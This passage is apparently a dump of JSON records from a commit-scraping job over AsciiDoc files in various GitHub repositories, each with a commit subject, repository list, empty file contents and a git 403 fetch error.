nh\/elasticsearch,scottsom\/elasticsearch,umeshdangat\/elasticsearch,LewayneNaidoo\/elasticsearch,wuranbo\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,gmarz\/elasticsearch,mjason3\/elasticsearch,MisterAndersen\/elasticsearch,i-am-Nathan\/elasticsearch,IanvsPoplicola\/elasticsearch,gingerwizard\/elasticsearch,alexshadow007\/elasticsearch,lks21c\/elasticsearch,uschindler\/elasticsearch,ZTE-PaaS\/elasticsearch,wenpos\/elasticsearch,lks21c\/elasticsearch,glefloch\/elasticsearch,robin13\/elasticsearch,JSCooke\/elasticsearch,mohit\/elasticsearch,spiegela\/elasticsearch,kalimatas\/elasticsearch,obourgain\/elasticsearch,Helen-Zhao\/elasticsearch,mortonsykes\/elasticsearch,Shepard1212\/elasticsearch,Stacey-Gammon\/elasticsearch,njlawton\/elasticsearch,winstonewert\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,i-am-Nathan\/elasticsearch,wangtuo\/elasticsearch,nknize\/elasticsearch,nazarewk\/elasticsearch,bawse\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,wuranbo\/elasticsearch,elasticdog\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,a2lin\/elasticsearch,fforbeck\/elasticsearch,scorpionvicky\/elasticsearch,fred84\/elasticsearch,mikemccand\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,alexshadow007\/elasticsearch,kalimatas\/elasticsearch,mikemccand\/elasticsearch,jprante\/elasticsearch,scottsom\/elasticsearch,njlawton\/elasticsearch,StefanGor\/elasticsearch,masaruh\/elasticsearch,robin13\/elasticsearch,MaineC\/elasticsearch,qwerty4030\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,geidies\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,geidies\/elasticsearch,HonzaKral\/elasticsearch,bawse\/elasticsearch,naveenhooda2000\/elasticsearch,nazarewk\/elasticsearch,uschindler\/elasticsearch,lks21c\/elasticsearch,gmarz\/elasticsearch,scottsom\/elasticsearch,Shepard1212\/elasticsearch,wenpos\/elasticsearch,Stacey-Gammon\/elasticsearch,nezirus\/elasticsearch,njlawton\/elasticsearch,jimczi\/elasticsearch,coding0011\/elasticsearch,sneivandt\/elasticsearch,i-am-Nathan\/elasticsearch,henakamaMSFT\/elasticsearch,GlenRSmith\/elasticsearch,shreejay\/elasticsearch,mjason3\/elasticsearch,mikemccand\/elasticsearch,gmarz\/elasticsearch,mortonsykes\/elasticsearch,s1monw\/elasticsearch,brandonkearby\/elasticsearch,masaruh\/elasticsearch,umeshdangat\/elasticsearch,artnowo\/elasticsearch,fernandozhu\/elasticsearch,fred84\/elasticsearch,henakamaMSFT\/elasticsearch,brandonkearby\/elasticsearch,rlugojr\/elasticsearch,jimczi\/elasticsearch,pozhidaevak\/elasticsearch,qwerty4030\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,njlawton\/elasticsearch,C-Bish\/elasticsearch,glefloch\/elasticsearch,sneivandt\/elasticsearch,scottsom\/elasticsearch,maddin2016\/elasticsearch,ZTE-PaaS\/elasticsearch,scottsom\/elasticsearch,mikemccand\/elasticsearch,wangtuo\/elasticsearch,lks21c\/elasticsearch,njlawton\/elasticsearch,LeoYao\/elasticsearch,JackyMai\/elasticsearch,strapdata\/elassandra,gmarz\/elasticsearch,StefanGor\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,glefloch\/elasticsearch,nazarewk\/elasticsearch,gmarz\/elasticsearch,yanjunh\/elasticsearch,C-Bish\/elasticsearch,vroyer\/elasticassandra,gingerwizard\/elasticsearch,MisterAndersen\/elasticsearch,LewayneNaidoo\/elasticsearch,scorpionvicky\/elasticsearch,IanvsPoplicola\/elasticsearch,jprante\/elasticsearch,spiegela\/elasticsearch,bawse\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,JervyShi\/elasticsearch,shreejay\/elasticsearch,nknize\/elasticsearch,maddin2016\/elasticsearch,elasticdog\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,gfyoung\/elasticsearch,liweinan0423\/elasticsearch,elasticdog\/elasticsearch,strapdata\/elassandra,nezirus\/elasticsearch,s1monw\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mjason3\/elasticsearch,GlenRSmith\/elasticsearch,wenpos\/elasticsearch,nilabhsagar\/elasticsearch,MaineC\/elasticsearch,jimczi\/elasticsearch,qwerty4030\/elasticsearch,JackyMai\/elasticsearch,geidies\/elasticsearch,JSCooke\/elasticsearch,jprante\/elasticsearch,fred84\/elasticsearch,masaruh\/elasticsearch,rajanm\/elasticsearch,IanvsPoplicola\/elasticsearch,GlenRSmith\/elasticsearch,C-Bish\/elasticsearch,maddin2016\/elasticsearch,winstonewert\/elasticsearch,henakamaMSFT\/elasticsearch,LeoYao\/elasticsearch,i-am-Nathan\/elasticsearch,Helen-Zhao\/elasticsearch,rlugojr\/elasticsearch,nilabhsagar\/elasticsearch,qwerty4030\/elasticsearch,obourgain\/elasticsearch,kalimatas\/elasticsearch,brandonkearby\/elasticsearch,StefanGor\/elasticsearch,coding0011\/elasticsearch,yanjunh\/elasticsearch,mikemccand\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JervyShi\/elasticsearch,vroyer\/elasticassandra,gfyoung\/elasticsearch,Helen-Zhao\/elasticsearch,jprante\/elasticsearch,nilabhsagar\/elasticsearch,elasticdog\/elasticsearch,elasticdog\/elasticsearch,i-am-Nathan\/elasticsearch,JervyShi\/elasticsearch,umeshdangat\/elasticsearch,liweinan0423\/elasticsearch,geidies\/elasticsearch,winstonewert\/elasticsearch,mohit\/elasticsearch,artnowo\/elasticsearch,JSCooke\/elasticsearch,henakamaMSFT\/elasticsearch,strapdata\/elassandra,vroyer\/elasticassandra,mortonsykes\/elasticsearch,wangtuo\/elasticsearch,liweinan0423\/elasticsearch,MisterAndersen\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,s1monw\/elasticsearch,alexshadow007\/elasticsearch,obourgain\/elasticsearch,IanvsPoplicola\/elasticsearch,a2lin\/elasticsearch,maddin2016\/elasticsearch,JackyMai\/elasticsearch,LeoYao\/elasticsearch,geidies\/elasticsearch,coding0011\/elasticsearch,MisterAndersen\/elasticsearch,masaruh\/elasticsearch,obourgain\/elasticsearch,wuranbo\/elasticsearch,brandonkearby\/elasticsearch,StefanGor\/elasticsearch,LeoYao\/elasticsearch,a2lin\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,winstonewert\/elasticsearch,sneivandt\/elasticsearch,fernandozhu\/elasticsearch,wenpos\/elasticsearch,liweinan0423\/elasticsearch,rajanm\/elasticsearch,LewayneNaidoo\/elasticsearch,shreejay\/elasticsearch,nezirus\/elasticsearch,pozhidaevak\/elasticsearch,fred84\/elasticsearch,sneivandt\/elasticsearch,MaineC\/elasticsearch,JackyMai\/elasticsearch,rlugojr\/elasticsearch,StefanGor\/elasticsearch,artnowo\/elasticsearch,wenpos\/elasticsearch,liweinan0423\/elasticsearch,JSCooke\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ZTE-PaaS\/elasticsearch,Shepard1212\/elasticsearch,jimczi\/elasticsearch,JSCooke\/elasticsearch,LewayneNaidoo\/elasticsearch,pozhidaevak\/elasticsearch,jimczi\/elasticsearch,nknize\/elasticsearch,a2lin\/elasticsearch,fernandozhu\/elasticsearch,wangtuo\/elasticsearch,IanvsPoplicola\/elasticsearch,shreejay\/elasticsearch,coding0011\/elasticsearch,Stacey-Gammon\/elasticsearch,winstonewert\/elasticsearch,nknize\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,JackyMai\/elasticsearch,LeoYao\/elasticsearch,nknize\/elasticsearch,artnowo\/elasticsearch,mohit\/elasticsearch,a2lin\/elasticsearch,Shepard1212\/elasticsearch,pozhidaevak\/elasticsearch,geidies\/elasticsearch,C-Bish\/elasticsearch,fred84\/elasticsearch,MisterAndersen\/elasticsearch","old_file":"docs\/reference\/query-dsl\/regexp-syntax.asciidoc","new_file":"docs\/reference\/query-dsl\/regexp-syntax.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e1a862dc5218c1da90ab911f713bd94178e3cede","subject":"Update 2016-04-07-Banner-grabbing.adoc","message":"Update 2016-04-07-Banner-grabbing.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Banner-grabbing.adoc","new_file":"_posts\/2016-04-07-Banner-grabbing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3125c0666f0086795cff670183bb04f11bb4797","subject":"Update 2016-04-11-Inyeccion-S-S-I.adoc","message":"Update 2016-04-11-Inyeccion-S-S-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Inyeccion-S-S-I.adoc","new_file":"_posts\/2016-04-11-Inyeccion-S-S-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b939055e984270873ed4d581d07b50a84deb8e20","subject":"Update 2015-03-24-Episode-16-Drunken-Farmer.adoc","message":"Update 2015-03-24-Episode-16-Drunken-Farmer.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-03-24-Episode-16-Drunken-Farmer.adoc","new_file":"_posts\/2015-03-24-Episode-16-Drunken-Farmer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59b9ec818b4bde97a7610e493aa7d2d1b996ea39","subject":"Update 2015-10-22-On-your-marks-Get-set-Die.adoc","message":"Update 2015-10-22-On-your-marks-Get-set-Die.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-22-On-your-marks-Get-set-Die.adoc","new_file":"_posts\/2015-10-22-On-your-marks-Get-set-Die.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"206c298a919c84f87f3b6893bc109e7d0f3b1e85","subject":"created stub architecture doc and added notes about what happens when JMS is down","message":"created stub architecture doc and added notes about what happens when JMS is down\n","repos":"rashidaligee\/kylo,Teradata\/kylo,Teradata\/kylo,rashidaligee\/kylo,claudiu-stanciu\/kylo,peter-gergely-horvath\/kylo,Teradata\/kylo,claudiu-stanciu\/kylo,claudiu-stanciu\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,Teradata\/kylo,rashidaligee\/kylo,peter-gergely-horvath\/kylo,rashidaligee\/kylo,Teradata\/kylo","old_file":"docs\/latest\/architecture.adoc","new_file":"docs\/latest\/architecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/claudiu-stanciu\/kylo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"820da66d9d8c5695661e7a889f4e21e490086c39","subject":"y2b create post Unboxing Cool Survival Gear","message":"y2b create post Unboxing Cool Survival Gear","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-07-28-Unboxing-Cool-Survival-Gear.adoc","new_file":"_posts\/2015-07-28-Unboxing-Cool-Survival-Gear.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"219b6d10c4034ae82b560c22594e2e1f0e139be4","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"302ccd6290b4ef0477279ba1b605ed0a8c6fdccb","subject":"Renamed '_posts\/2018-01-09-Build-Blog-With-Hub-Press.adoc' to '_posts\/2018-01-09-Build-Blog-With-Hubpress.adoc'","message":"Renamed '_posts\/2018-01-09-Build-Blog-With-Hub-Press.adoc' to '_posts\/2018-01-09-Build-Blog-With-Hubpress.adoc'","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2018-01-09-Build-Blog-With-Hubpress.adoc","new_file":"_posts\/2018-01-09-Build-Blog-With-Hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17e135d5fcb4857b9e02824e333cd458af83bb8d","subject":"Update 2017-11-12-.adoc","message":"Update 2017-11-12-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-12-.adoc","new_file":"_posts\/2017-11-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3dc96bf5759be2e7a3110f37931d35e25e5f2cb","subject":"Update 2017-06-20-DL-meet-with-Neuroscience-3.adoc","message":"Update 2017-06-20-DL-meet-with-Neuroscience-3.adoc","repos":"SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io","old_file":"_posts\/2017-06-20-DL-meet-with-Neuroscience-3.adoc","new_file":"_posts\/2017-06-20-DL-meet-with-Neuroscience-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SRTjiawei\/SRTjiawei.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1e800eadeff69d0800b0b856a11153e57e10dbe","subject":"Publish 2016-7-8.adoc","message":"Publish 2016-7-8.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-8.adoc","new_file":"2016-7-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"797c2ffb701a1a0524072310105b3a6921078006","subject":"Publish 2016-7-8.adoc","message":"Publish 2016-7-8.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-8.adoc","new_file":"2016-7-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc580690741acca27112b728ea23bcac87c50081","subject":"Fix typo in 0.8 release notes","message":"Fix typo in 0.8 release notes\n\nChange-Id: I1650870b087e4999aee9a5f8eb6828035084cb52\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/2700\nReviewed-by: Jean-Daniel Cryans\nTested-by: Kudu Jenkins\n","repos":"EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b74fd26e92ad52cee7b24f18f8c01480b144ec7a","subject":"initial cut of GEP-4","message":"initial cut of GEP-4\n","repos":"groovy\/groovy-website,groovy\/groovy-website","old_file":"site\/src\/site\/wiki\/GEP-4.adoc","new_file":"site\/src\/site\/wiki\/GEP-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/groovy\/groovy-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aa917b739ed4f2a4db438eb5eae2d13865bf4b22","subject":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","message":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","repos":"jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io","old_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jtsiros\/jtsiros.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95a3664dde5f4f78a05d1a2b3cf28f4c7c87272d","subject":"Talk about the Hawkular-metrics 0.3.1 release","message":"Talk about the Hawkular-metrics 0.3.1 release\n","repos":"tsegismont\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,ppalaga\/hawkular.github.io,ppalaga\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,metlos\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,lzoubek\/hawkular.github.io,metlos\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,lzoubek\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,metlos\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/2015-04-07-1.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/2015-04-07-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89e33d2303042f9988ebb242bcb7de71b7a6f920","subject":"Create README.adoc","message":"Create README.adoc","repos":"Accordance\/microservice-dojo,Accordance\/microservice-dojo,Accordance\/microservice-dojo,Accordance\/microservice-dojo","old_file":"kata-spring-restdocs\/solution\/mysvc\/README.adoc","new_file":"kata-spring-restdocs\/solution\/mysvc\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Accordance\/microservice-dojo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55313bf21a73915ac07b33a6da3cb8ba88cc0c49","subject":"Update 2017-12-03-visual-studio-code-extension.adoc","message":"Update 2017-12-03-visual-studio-code-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-03-visual-studio-code-extension.adoc","new_file":"_posts\/2017-12-03-visual-studio-code-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f8fe6ee2dc14747631c685ce29de734cd4ea646","subject":"Create fr\/les_principes.adoc","message":"Create fr\/les_principes.adoc","repos":"reyman\/mageo-documentation,reyman\/mageo-documentation,reyman\/mageo-documentation","old_file":"fr\/les_principes.adoc","new_file":"fr\/les_principes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reyman\/mageo-documentation.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"7b2b6b08ef51e304e925321ac88f3bc821c516b7","subject":"Update 2015-06-08-Lorem-ipsum-4.adoc","message":"Update 2015-06-08-Lorem-ipsum-4.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-08-Lorem-ipsum-4.adoc","new_file":"_posts\/2015-06-08-Lorem-ipsum-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96d48db3db5256e6201c7b06f742440ae3112e08","subject":"Update 2016-03-28-this-is-a-day.adoc","message":"Update 2016-03-28-this-is-a-day.adoc","repos":"regdog\/regdog.github.io,regdog\/regdog.github.io,regdog\/regdog.github.io","old_file":"_posts\/2016-03-28-this-is-a-day.adoc","new_file":"_posts\/2016-03-28-this-is-a-day.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/regdog\/regdog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f15d9c358a84f9a5140868ddf2b21f1e49552d2e","subject":"Create 2016-08-08-Session-Notes.adoc","message":"Create 2016-08-08-Session-Notes.adoc","repos":"chackomathew\/blog,chackomathew\/blog,chackomathew\/blog,chackomathew\/blog","old_file":"_posts\/2016-08-08-Session-Notes.adoc","new_file":"_posts\/2016-08-08-Session-Notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chackomathew\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48feca6891e23c774285a52457026a957421955e","subject":"Update Kaui_Guide_Draft (4) (1).adoc","message":"Update Kaui_Guide_Draft (4) (1).adoc\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f118613f81567d1e021a6b9926377d9c5b357c3d","subject":"Update 2012-12-31-1-an-a-Lateral-Thoughts.adoc","message":"Update 2012-12-31-1-an-a-Lateral-Thoughts.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2012-12-31-1-an-a-Lateral-Thoughts.adoc","new_file":"_posts\/2012-12-31-1-an-a-Lateral-Thoughts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"727ce0b0cffdce112f7a616566592452241238fd","subject":"Update terminology from front page","message":"Update terminology from front page","repos":"pstirparo\/artifacts,Onager\/artifacts,joachimmetz\/artifacts,joachimmetz\/artifacts,Onager\/artifacts,ForensicArtifacts\/artifacts,ForensicArtifacts\/artifacts,pstirparo\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joachimmetz\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8a460161fc434e967322e51a37ca2653698822f","subject":"y2b create post DIY Custom Apple Watch","message":"y2b create post DIY Custom Apple Watch","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-05-04-DIY-Custom-Apple-Watch.adoc","new_file":"_posts\/2015-05-04-DIY-Custom-Apple-Watch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"002ef49c5ded98def28398000984e532de9c927e","subject":"Update 2017-02-25-egy.adoc","message":"Update 2017-02-25-egy.adoc","repos":"neurodiversitas\/neurodiversitas.github.io,neurodiversitas\/neurodiversitas.github.io,neurodiversitas\/neurodiversitas.github.io,neurodiversitas\/neurodiversitas.github.io","old_file":"_posts\/2017-02-25-egy.adoc","new_file":"_posts\/2017-02-25-egy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neurodiversitas\/neurodiversitas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9cb70198e84bf1d97182497a9760882a25d8ef0","subject":"Typo in the description for include_in_all","message":"Typo in the description for include_in_all\n\nI know this is uber-minor, but I was confused by the phrase \"the raw field value to be copied\". I assume \"is\" was supposed to be instead of \"to\"\n","repos":"tkssharma\/elasticsearch,mcku\/elasticsearch,ajhalani\/elasticsearch,anti-social\/elasticsearch,adrianbk\/elasticsearch,kubum\/elasticsearch,lzo\/elasticsearch-1,Liziyao\/elasticsearch,martinstuga\/elasticsearch,javachengwc\/elasticsearch,overcome\/elasticsearch,LewayneNaidoo\/elasticsearch,zeroctu\/elasticsearch,Brijeshrpatel9\/elasticsearch,girirajsharma\/elasticsearch,peschlowp\/elasticsearch,brandonkearby\/elasticsearch,ESamir\/elasticsearch,clintongormley\/elasticsearch,rmuir\/elasticsearch,camilojd\/elasticsearch,kaneshin\/elasticsearch,kenshin233\/elasticsearch,rento19962\/elasticsearch,StefanGor\/elasticsearch,yuy168\/elasticsearch,zhiqinghuang\/elasticsearch,djschny\/elasticsearch,bestwpw\/elasticsearch,petmit\/elasticsearch,MaineC\/elasticsearch,xpandan\/elasticsearch,nilabhsagar\/elasticsearch,cnfire\/elasticsearch-1,zhiqinghuang\/elasticsearch,mrorii\/elasticsearch,vroyer\/elassandra,markllama\/elasticsearch,vrkansagara\/elasticsearch,ajhalani\/elasticsearch,JervyShi\/elasticsearch,polyfractal\/elasticsearch,nrkkalyan\/elasticsearch,skearns64\/elas